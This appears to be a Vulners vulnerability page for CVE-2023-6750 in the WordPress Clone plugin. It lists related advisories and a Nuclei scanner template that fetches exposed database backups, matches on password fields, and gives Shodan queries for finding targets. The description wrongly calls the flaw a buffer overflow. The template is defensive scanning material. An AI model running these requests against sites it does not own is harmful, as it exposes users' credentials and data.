| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2023-6750 | 13 Jan 202400:41 | – | circl | |
| WordPress Plugin Clone Security Vulnerability | 8 Jan 202400:00 | – | cnnvd | |
| CVE-2023-6750 | 8 Jan 202419:00 | – | cve | |
| CVE-2023-6750 Clone < 2.4.3 - Unauthenticated Backup Download | 8 Jan 202419:00 | – | cvelist | |
| CVE-2023-6750 | 8 Jan 202419:15 | – | nvd | |
| CVE-2023-6750 | 8 Jan 202419:15 | – | osv | |
| WordPress Clone Plugin <= 2.4.2 is vulnerable to Sensitive Data Exposure | 20 Dec 202300:00 | – | patchstack | |
| Path traversal | 8 Jan 202419:15 | – | prion | |
| PT-2023-32756 | 19 Dec 202300:00 | – | ptsecurity | |
| CVE-2023-6750 | 23 May 202504:58 | – | redhatcve |
id: CVE-2023-6750
info:
name: WordPress WP Clone <= 2.4.2 - Database Backup Exposure
author: pussycat0x
severity: critical
description: |
Clone WordPress plugin < 2.4.3 contains a buffer overflow caused by storing in-progress backup information in publicly accessible buffer files at a static file path, letting attackers access sensitive backup data, exploit requires no special privileges
impact: |
Attackers can access sensitive backup information, potentially leading to data disclosure or manipulation.
remediation: |
Update to version 2.4.3 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-clone-by-wp-academy/clone-242-sensitive-information-exposure
- https://plugins.trac.wordpress.org/changeset/3012647/wp-clone-by-wp-academy
- https://nvd.nist.gov/vuln/detail/CVE-2023-6750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6750
epss-score: 0.01961
epss-percentile: 0.77843
cwe-id: CWE-200
cpe: cpe:2.3:a:developer:clone:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
product: clone
framework: wordpress
shodan-query: http.html:"wp-clone-by-wp-academy"
fofa-query: body="wp-clone-by-wp-academy"
tags: cve,cve2023,wp,wp-plugin,wordpress,wp-clone,backup
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/database.sql"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CREATE TABLE"
- "INSERT INTO"
condition: and
- type: word
part: body
words:
- "wp_users"
- "wp_options"
- "user_pass"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
name: db_table
part: body
group: 1
regex:
- "CREATE TABLE[^`]*`([^`]+)`"
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "^[a-zA-Z0-9_]+$"
- type: status
status:
- 200
# digest: 4a0a0047304502205caaba4c4a80c7cb7744bb564906a56269f1ba0f4e9bf259eb3a648738065a19022100f1be95abecb2381b53b0f41ac5a50060dfaf1a0d1d6a25c0986e1e7c5b8fef68:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation